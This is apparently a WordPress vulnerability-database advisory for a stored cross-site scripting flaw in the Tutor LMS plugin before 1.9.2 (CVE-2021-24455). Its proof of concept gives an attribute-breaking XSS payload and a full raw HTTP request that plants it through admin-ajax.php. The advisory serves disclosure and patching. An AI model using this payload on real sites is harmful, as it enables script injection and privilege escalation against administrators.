WordPress Plugin Vulnerabilities

Tutor LMS < 1.9.2 - Authenticated Stored Cross-Site Scripting (XSS)

Description

The plugin did not escape the Summary field of Announcements (when outputting it in an attribute), which can be created by users as low as Tutor Instructor. This lead to a Stored Cross-Site Scripting issue, which is triggered when viewing the Announcements list, and could result in privilege escalation when viewed by an admin.

Proof of Concept

As a Tutor Instructor, Create an Announcement and put the following payload in the Summary field: " style="animation-name:rotation" onanimationstart="alert(/XSS/)//

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 341
Connection: close
Cookie: [Tutor Instructor+]

_tutor_nonce=52e764441f&tutor_announcement_course=973&tutor_announcement_title=Test+Inst+XSS&tutor_announcement_summary=%22+style%3D%22animation-name%3Arotation%22+onanimationstart%3D%22alert(%2FXSS%2F)%2F%2F&action=tutor_announcement_create&action_type=create

Affects Plugins

Plugin icon
tutor
Fixed in 1.9.2

References

CVE
CVE-2021-24455

Classification

Type
XSS
OWASP top 10
A7: Cross-Site Scripting (XSS)
CWE
CWE-79
CVSS
8.2 (high)

Miscellaneous

Original Researcher
Phu Tran from techlabcorp.com
Submitter
Phu Tran
Verified
Yes
WPVDB ID
9ef14cf1-1e04-4125-a296-9aa5388612f9

Timeline

Publicly Published
2021-06-28 (about 2 years ago)
Added
2021-06-28 (about 2 years ago)
Last Updated
2021-08-10 (about 2 years ago)

Other

Published
Title
Published
2022-03-21
Title
WPvivid Backup and Migration Plugin < 0.9.70 - Reflected Cross-Site Scripting
Published
2022-11-30
Title
All in One Time Clock Lite < 1.3.321 - Admin+ Stored XSS
Published
2015-10-13
Title
WP-Piwik <= 1.0.4 - Cross-Site Scripting (XSS)
Published
2023-08-17
Title
Simple Staff List < 2.2.4 - Editor+ Stored XSS
Published
2015-08-13
Title
Google Language Translator < 5.0.0 - Authenticated Cross-Site Scripting (XSS)